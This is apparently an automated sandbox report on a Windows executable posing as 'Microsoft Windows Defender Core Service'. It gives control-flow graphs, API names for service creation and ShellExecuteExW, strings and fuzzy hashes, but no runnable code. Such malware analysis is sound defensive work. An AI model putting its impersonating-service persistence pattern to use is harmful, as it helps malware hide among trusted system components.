                                                                                                      control_flow_graph 0 7ff76e1831e0-7ff76e183229 GetModuleFileNameW 1 7ff76e183311-7ff76e18342e call 7ff76e18ca60 call 7ff76e181300 OpenSCManagerW 0->1 2 7ff76e18322f-7ff76e18325a 0->2 11 7ff76e183434-7ff76e183527 1->11 12 7ff76e1835b1-7ff76e183612 CreateServiceW 1->12 4 7ff76e183260-7ff76e18326c 2->4 4->4 6 7ff76e18326e-7ff76e183289 4->6 8 7ff76e183290-7ff76e183298 6->8 8->8 10 7ff76e18329a-7ff76e1832d6 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 8->10 35 7ff76e18383c-7ff76e183867 call 7ff76e190580 10->35 36 7ff76e1832dc-7ff76e1832ed 10->36 16 7ff76e183530-7ff76e183538 11->16 14 7ff76e18371c-7ff76e18374b 12->14 15 7ff76e183618-7ff76e18365a 12->15 18 7ff76e183751-7ff76e18375d 14->18 19 7ff76e183660-7ff76e183670 15->19 16->16 20 7ff76e18353a-7ff76e183576 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 16->20 18->18 23 7ff76e18375f-7ff76e18377a 18->23 19->19 24 7ff76e183672-7ff76e18368a 19->24 55 7ff76e18357c-7ff76e18358d 20->55 56 7ff76e183800-7ff76e183808 20->56 27 7ff76e183780-7ff76e183788 23->27 28 7ff76e183691-7ff76e183699 24->28 27->27 32 7ff76e18378a-7ff76e1837ad call 7ff76e18df40 call 7ff76e181250 27->32 28->28 33 7ff76e18369b-7ff76e1836e0 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 CloseServiceHandle 28->33 52 7ff76e1837b2-7ff76e1837ba 32->52 33->56 72 7ff76e1836e6-7ff76e1836f7 33->72 40 7ff76e183837 call 7ff76e1905a0 36->40 41 7ff76e1832f3-7ff76e183306 36->41 40->35 46 7ff76e18386e-7ff76e183873 call 7ff76e19c3e4 41->46 47 7ff76e18330c 41->47 67 7ff76e183874-7ff76e183879 call 7ff76e19c3e4 46->67 47->40 57 7ff76e1837ed-7ff76e1837ff CloseServiceHandle * 2 52->57 58 7ff76e1837bc-7ff76e1837cd 52->58 61 7ff76e183593-7ff76e1835a6 55->61 62 7ff76e183712-7ff76e183717 call 7ff76e1905a0 55->62 56->35 63 7ff76e18380a-7ff76e183820 56->63 57->56 64 7ff76e1837e8 call 7ff76e1905a0 58->64 65 7ff76e1837cf-7ff76e1837e2 58->65 61->67 68 7ff76e1835ac 61->68 62->56 63->40 70 7ff76e183822-7ff76e183835 63->70 64->57 65->64 71 7ff76e183880-7ff76e1838cd call 7ff76e19c3e4 RegisterServiceCtrlHandlerW 65->71 82 7ff76e18387a-7ff76e18387f call 7ff76e19c3e4 67->82 68->62 70->40 76 7ff76e183868-7ff76e18386d call 7ff76e19c3e4 70->76 85 7ff76e183b38-7ff76e183ba6 SetServiceStatus CreateEventW 71->85 86 7ff76e1838d3-7ff76e183af7 call 7ff76e18c730 call 7ff76e18ca60 call 7ff76e183d40 71->86 72->62 77 7ff76e1836f9-7ff76e18370c 72->77 76->46 77->62 77->82 82->71 88 7ff76e183ba8-7ff76e183bff SetServiceStatus CreateThread 85->88 89 7ff76e183c01-7ff76e183c36 call 7ff76e1b7080 SetServiceStatus 85->89 96 7ff76e183c44-7ff76e183c58 call 7ff76e190580 86->96 102 7ff76e183afd-7ff76e183b13 86->102 88->89 91 7ff76e183c3c 88->91 89->91 91->96 103 7ff76e183b2e-7ff76e183b33 call 7ff76e1905a0 102->103 104 7ff76e183b15-7ff76e183b28 102->104 103->96 104->103 105 7ff76e183c59-7ff76e183c67 call 7ff76e19c3e4 104->105 110 7ff76e183c6d-7ff76e183cd9 SetServiceStatus SetEvent 105->110 111 7ff76e183d36-7ff76e183d3a 105->111 112 7ff76e183cdb-7ff76e183ce1 110->112 113 7ff76e183ce3-7ff76e183cf0 110->113 114 7ff76e183cf7-7ff76e183d0b 112->114 115 7ff76e183d0d 113->115 116 7ff76e183cf2-7ff76e183cf5 113->116 117 7ff76e183d13-7ff76e183d2a SetServiceStatus 114->117 115->117 116->114 116->115 117->111
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$_invalid_parameter_noinfo_noreturn$ErrorLastStatus$CloseCreateHandle$Event$CtrlFileHandlerManagerModuleNameOpenRegisterThread
                                                                                                      • String ID: %s$%s (%d)$%s (%d)$%s (%d)$Microsoft Windows Defender Core Service$MicrosoftWindowsDefenderCoreService$MicrosoftWindowsDefenderCoreService$ggiw$h$wy$wjyp
                                                                                                      • API String ID: 1620023548-2121530606
                                                                                                      • Opcode ID: 4698ba084db337f1926770bf5d794d63a9ca90ae822dd769ec67dbca79ed55bc
                                                                                                      • Instruction ID: 0defbf4164db25b38007ad0d3792e968173a21bacbfa599d10557c408ded4f13
                                                                                                      • Opcode Fuzzy Hash: 4698ba084db337f1926770bf5d794d63a9ca90ae822dd769ec67dbca79ed55bc
                                                                                                      • Instruction Fuzzy Hash: FC62C462E08681CAE704EF74E4402AEB3A1FF49754F901236DA5C87695EF3CE185DB39
                                                                                                      Function 00007FF76E182090 Relevance: 56.9, APIs: 11, Strings: 21, Instructions: 870stringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 118 7ff76e182090-7ff76e182627 call 7ff76e18ca60 * 2 123 7ff76e182630-7ff76e182678 118->123 123->123 124 7ff76e18267a-7ff76e18267e 123->124 125 7ff76e18269e-7ff76e1826bf call 7ff76e18ca60 GetCurrentProcessId 124->125 126 7ff76e182680-7ff76e182685 124->126 130 7ff76e1826c0-7ff76e1826ed 125->130 128 7ff76e182690-7ff76e18269c 126->128 128->125 128->128 130->130 131 7ff76e1826ef-7ff76e1827d7 call 7ff76e18eb90 130->131 134 7ff76e1827e0-7ff76e1827ef 131->134 134->134 135 7ff76e1827f1-7ff76e182840 call 7ff76e18ca60 134->135 138 7ff76e182842-7ff76e18287e call 7ff76e1b45c0 135->138 139 7ff76e182880-7ff76e18289e call 7ff76e18e340 135->139 144 7ff76e1828a5-7ff76e182a09 ShellExecuteExW 138->144 139->144 145 7ff76e182a10-7ff76e182a26 144->145 145->145 146 7ff76e182a28-7ff76e182a66 call 7ff76e18ca60 lstrcmpiW 145->146 149 7ff76e182a6c call 7ff76e1831e0 146->149 150 7ff76e182c91-7ff76e182cca StartServiceCtrlDispatcherW 146->150 154 7ff76e182a71-7ff76e182a7d 149->154 152 7ff76e182fc5-7ff76e182fd0 150->152 153 7ff76e182cd0-7ff76e182f88 call 7ff76e18c820 call 7ff76e18ca60 call 7ff76e183d40 150->153 155 7ff76e18300b-7ff76e18302d 152->155 156 7ff76e182fd2-7ff76e182feb 152->156 219 7ff76e182f8a-7ff76e182fa3 153->219 220 7ff76e182fc3 153->220 158 7ff76e182ab8-7ff76e182ada 154->158 159 7ff76e182a7f-7ff76e182a98 154->159 162 7ff76e183068-7ff76e183085 155->162 163 7ff76e18302f-7ff76e183048 155->163 160 7ff76e182fed-7ff76e183000 156->160 161 7ff76e183006 call 7ff76e1905a0 156->161 171 7ff76e182adc-7ff76e182af5 158->171 172 7ff76e182b15-7ff76e182b32 158->172 167 7ff76e182a9a-7ff76e182aad 159->167 168 7ff76e182ab3 call 7ff76e1905a0 159->168 160->161 169 7ff76e1831bf-7ff76e1831c4 call 7ff76e19c3e4 160->169 161->155 165 7ff76e1830bd-7ff76e1830c8 162->165 166 7ff76e183087-7ff76e183099 162->166 173 7ff76e18304a-7ff76e18305d 163->173 174 7ff76e183063 call 7ff76e1905a0 163->174 181 7ff76e1830ca-7ff76e1830e3 165->181 182 7ff76e183103-7ff76e18311d 165->182 177 7ff76e18309b-7ff76e1830ae 166->177 178 7ff76e1830b4-7ff76e1830bc call 7ff76e1905a0 166->178 167->168 167->169 168->158 187 7ff76e1831c5-7ff76e1831ca call 7ff76e19c3e4 169->187 185 7ff76e182af7-7ff76e182b0a 171->185 186 7ff76e182b10 call 7ff76e1905a0 171->186 179 7ff76e182b6a-7ff76e182b75 172->179 180 7ff76e182b34-7ff76e182b46 172->180 173->174 173->187 174->162 177->178 197 7ff76e1831cb-7ff76e1831d0 call 7ff76e19c3e4 177->197 178->165 193 7ff76e182b77-7ff76e182b90 179->193 194 7ff76e182bb0-7ff76e182bca 179->194 191 7ff76e182b48-7ff76e182b5b 180->191 192 7ff76e182b61-7ff76e182b69 call 7ff76e1905a0 180->192 199 7ff76e1830fe call 7ff76e1905a0 181->199 200 7ff76e1830e5-7ff76e1830f8 181->200 201 7ff76e183154-7ff76e18316e 182->201 202 7ff76e18311f-7ff76e183138 182->202 185->186 185->187 186->172 187->197 191->192 191->197 192->179 207 7ff76e182bab call 7ff76e1905a0 193->207 208 7ff76e182b92-7ff76e182ba5 193->208 209 7ff76e182bcc-7ff76e182be5 194->209 210 7ff76e182c05-7ff76e182c1f 194->210 214 7ff76e1831d1-7ff76e1831d6 call 7ff76e19c3e4 197->214 199->182 200->199 200->214 204 7ff76e182c5a-7ff76e182c90 call 7ff76e190580 201->204 205 7ff76e183174-7ff76e18318d 201->205 216 7ff76e18313a-7ff76e18314d 202->216 217 7ff76e18314f call 7ff76e1905a0 202->217 221 7ff76e182c55 call 7ff76e1905a0 205->221 222 7ff76e183193-7ff76e1831a6 205->222 207->194 208->207 208->214 225 7ff76e182be7-7ff76e182bfa 209->225 226 7ff76e182c00 call 7ff76e1905a0 209->226 210->204 227 7ff76e182c21-7ff76e182c3a 210->227 216->217 231 7ff76e1831ad-7ff76e1831b2 call 7ff76e19c3e4 216->231 217->201 232 7ff76e182fbe call 7ff76e1905a0 219->232 233 7ff76e182fa5-7ff76e182fb8 219->233 220->152 221->204 234 7ff76e1831a8 222->234 235 7ff76e1831b3-7ff76e1831b8 call 7ff76e19c3e4 222->235 225->226 225->231 226->210 227->221 238 7ff76e182c3c-7ff76e182c4f 227->238 231->235 232->220 233->232 242 7ff76e1831b9-7ff76e1831be call 7ff76e19c3e4 233->242 234->221 235->242 238->221 238->235 242->169
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Event$Source$Concurrency::cancel_current_taskCtrlCurrentDeregisterDispatcherErrorExecuteLastProcessRegisterReportServiceShellStartlstrcmpi
                                                                                                      • String ID: )4$++$3&$>$G.$MicrosoftWindowsDefenderCoreService$O$O$P$h$h$h$m$m$n$p$t$u$y$z${
                                                                                                      • API String ID: 320493407-2801309204
                                                                                                      • Opcode ID: 3335491839efc0a822470bfbcb9017b3bbd4571457d321bc2182deb53b8a3e6d
                                                                                                      • Instruction ID: 1ca9ad8e6086db460cacc772ef49dfbe563a68bcdcd135cba1e035cc9c6653f6
                                                                                                      • Opcode Fuzzy Hash: 3335491839efc0a822470bfbcb9017b3bbd4571457d321bc2182deb53b8a3e6d
                                                                                                      • Instruction Fuzzy Hash: F492D666A146C1CAE724AF74E4003FD73B0FF58748F806136E65C8BAA4EB3C9581D729
                                                                                                      Function 00007FF76E1A3ACC Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 249 7ff76e1a3acc-7ff76e1a3af1 250 7ff76e1a3dbf 249->250 251 7ff76e1a3af7-7ff76e1a3afa 249->251 252 7ff76e1a3dc1-7ff76e1a3dd1 250->252 253 7ff76e1a3b33-7ff76e1a3b5f 251->253 254 7ff76e1a3afc-7ff76e1a3b2e call 7ff76e19c2f8 251->254 255 7ff76e1a3b61-7ff76e1a3b68 253->255 256 7ff76e1a3b6a-7ff76e1a3b70 253->256 254->252 255->254 255->256 258 7ff76e1a3b80-7ff76e1a3b95 call 7ff76e1ae834 256->258 259 7ff76e1a3b72-7ff76e1a3b7b call 7ff76e1a77f8 256->259 264 7ff76e1a3caf-7ff76e1a3cb8 258->264 265 7ff76e1a3b9b-7ff76e1a3ba4 258->265 259->258 267 7ff76e1a3cba-7ff76e1a3cc0 264->267 268 7ff76e1a3d0c-7ff76e1a3d31 WriteFile 264->268 265->264 266 7ff76e1a3baa-7ff76e1a3bae 265->266 271 7ff76e1a3bb0-7ff76e1a3bb8 call 7ff76e19a9a0 266->271 272 7ff76e1a3bbf-7ff76e1a3bca 266->272 273 7ff76e1a3cc2-7ff76e1a3cc5 267->273 274 7ff76e1a3cf8-7ff76e1a3d05 call 7ff76e1a3584 267->274 269 7ff76e1a3d33-7ff76e1a3d39 call 7ff76e1b7080 268->269 270 7ff76e1a3d3c 268->270 269->270 277 7ff76e1a3d3f 270->277 271->272 281 7ff76e1a3bcc-7ff76e1a3bd5 272->281 282 7ff76e1a3bdb-7ff76e1a3bf0 call 7ff76e1b72e0 272->282 279 7ff76e1a3ce4-7ff76e1a3cf6 call 7ff76e1a37a4 273->279 280 7ff76e1a3cc7-7ff76e1a3cca 273->280 285 7ff76e1a3d0a 274->285 287 7ff76e1a3d44 277->287 293 7ff76e1a3c9c-7ff76e1a3ca3 279->293 289 7ff76e1a3d50-7ff76e1a3d5a 280->289 290 7ff76e1a3cd0-7ff76e1a3ce2 call 7ff76e1a3688 280->290 281->264 281->282 300 7ff76e1a3bf6-7ff76e1a3bfc 282->300 301 7ff76e1a3ca8 282->301 285->293 294 7ff76e1a3d49 287->294 296 7ff76e1a3db8-7ff76e1a3dbd 289->296 297 7ff76e1a3d5c-7ff76e1a3d61 289->297 290->293 293->287 294->289 296->252 298 7ff76e1a3d8f-7ff76e1a3d99 297->298 299 7ff76e1a3d63-7ff76e1a3d66 297->299 307 7ff76e1a3da0-7ff76e1a3daf 298->307 308 7ff76e1a3d9b-7ff76e1a3d9e 298->308 303 7ff76e1a3d7f-7ff76e1a3d8a call 7ff76e19d318 299->303 304 7ff76e1a3d68-7ff76e1a3d77 299->304 305 7ff76e1a3c02-7ff76e1a3c05 300->305 306 7ff76e1a3c85-7ff76e1a3c97 call 7ff76e1a310c 300->306 301->264 303->298 304->303 310 7ff76e1a3c10-7ff76e1a3c1e 305->310 311 7ff76e1a3c07-7ff76e1a3c0a 305->311 306->293 307->296 308->250 308->307 314 7ff76e1a3c20 310->314 315 7ff76e1a3c7c-7ff76e1a3c80 310->315 311->294 311->310 316 7ff76e1a3c24-7ff76e1a3c3b call 7ff76e1aea7c 314->316 315->277 319 7ff76e1a3c73-7ff76e1a3c79 call 7ff76e1b7080 316->319 320 7ff76e1a3c3d-7ff76e1a3c49 316->320 319->315 322 7ff76e1a3c68-7ff76e1a3c6f 320->322 323 7ff76e1a3c4b-7ff76e1a3c5d call 7ff76e1aea7c 320->323 322->315 324 7ff76e1a3c71 322->324 323->319 328 7ff76e1a3c5f-7ff76e1a3c66 323->328 324->316 328->322
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 22a347ff353ab49432d2b42e96d8d9a8c726387284fb579308b91fa641ddd612
                                                                                                      • Instruction ID: e89341eee3a6507a0bd9f3910056b1efb815e622078f23d0224c5628ad99183e
                                                                                                      • Opcode Fuzzy Hash: 22a347ff353ab49432d2b42e96d8d9a8c726387284fb579308b91fa641ddd612
                                                                                                      • Instruction Fuzzy Hash: 4291C862F18651C5F758AF69A8443BCABA0BB04B84FD4413ADE0E57A84DF3CD443A738
                                                                                                      Function 00007FF76E19ECBC Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 57dfe235044c4d1b5e0c3719e619ff88c0380d6cde3ba8c933f2ad1b22e4824d
                                                                                                      • Instruction ID: 0affae1e46e7f0f6810761e79846a7ccfcfc732d2317042812d1fd634303ea45
                                                                                                      • Opcode Fuzzy Hash: 57dfe235044c4d1b5e0c3719e619ff88c0380d6cde3ba8c933f2ad1b22e4824d
                                                                                                      • Instruction Fuzzy Hash: 75D09E20F18606D6EB1C7B70BC9507892966F48701F911939D98B173D3DD3DA949A239
                                                                                                      Function 00007FF76E1909AC Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1236291503-0
                                                                                                      • Opcode ID: f6557d902d0f924d53d81b320cd09ed928179405ef90910cdb8231627aa68b17
                                                                                                      • Instruction ID: 8176ecfc0dd8defda7fcd49f360687bcfec4d83ecb30cec352c035df38e67642
                                                                                                      • Opcode Fuzzy Hash: f6557d902d0f924d53d81b320cd09ed928179405ef90910cdb8231627aa68b17
                                                                                                      • Instruction Fuzzy Hash: 84414E21E0C142C5FA5CBB61F4113B99393BF45B84FC44035E64E4B2E3EE6CAD45A679
                                                                                                      Function 00007FF76E1A3584 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: f4cbf904ff233b95289d481c635fb609254e964d0459cd630feb07302fab001c
                                                                                                      • Instruction ID: f40b4faeededdcd3e4142e67063f7e9072071b6636fadacf8c5cabc5f306cab3
                                                                                                      • Opcode Fuzzy Hash: f4cbf904ff233b95289d481c635fb609254e964d0459cd630feb07302fab001c
                                                                                                      • Instruction Fuzzy Hash: 4331D472A18A81C6DB14AF29F4443ADB764FB58780F848032EB4D83B54EF3CD516DB24
                                                                                                      Function 00007FF76E1A2244 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: fcdea19bf642dc27f92512411235abc235e2eefdf2d9d23fa984bc5e21e92c92
                                                                                                      • Instruction ID: 54f3bbe0140ea484efec7f086cb5d36c8642f1241bea0b771c268b79e886ed9b
                                                                                                      • Opcode Fuzzy Hash: fcdea19bf642dc27f92512411235abc235e2eefdf2d9d23fa984bc5e21e92c92
                                                                                                      • Instruction Fuzzy Hash: 1F31A721E18B45C1D7689B19B580178A751FB56BB0FA8033ADB6E477E0CF38E4A1E374
                                                                                                      Function 00007FF76E1908C0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                      • String ID:
                                                                                                      • API String ID: 3548387204-0
                                                                                                      • Opcode ID: d09a022d1338bd451590cea5300501282c79fe63a09ae3173060406b60f23086
                                                                                                      • Instruction ID: 0a61157701d2dca385b158f5b67433c3b6a01bf0ccc583792da725b90a261ad9
                                                                                                      • Opcode Fuzzy Hash: d09a022d1338bd451590cea5300501282c79fe63a09ae3173060406b60f23086
                                                                                                      • Instruction Fuzzy Hash: 7411B014F08507C2FA1C73B1B8562BE82861F80740FD11434E90E8A2D7EE1CBD89B27E
                                                                                                      Function 00007FF76E1AAD5C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3328510275-0
                                                                                                      • Opcode ID: edf19524608edbef5f136d65a101a5aa1c9b6fa273476f70753406903fc38faf
                                                                                                      • Instruction ID: 0afc5cc68e02cab9144ebead40ab9ac64c009e3b757e55d033dfb02e654b83ab
                                                                                                      • Opcode Fuzzy Hash: edf19524608edbef5f136d65a101a5aa1c9b6fa273476f70753406903fc38faf
                                                                                                      • Instruction Fuzzy Hash: F0016511E09765C1EA29BB16741007EA360AF54FE0B884635DFAE17BD6DE2CE8429274
                                                                                                      Function 00007FF76E19EBED Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
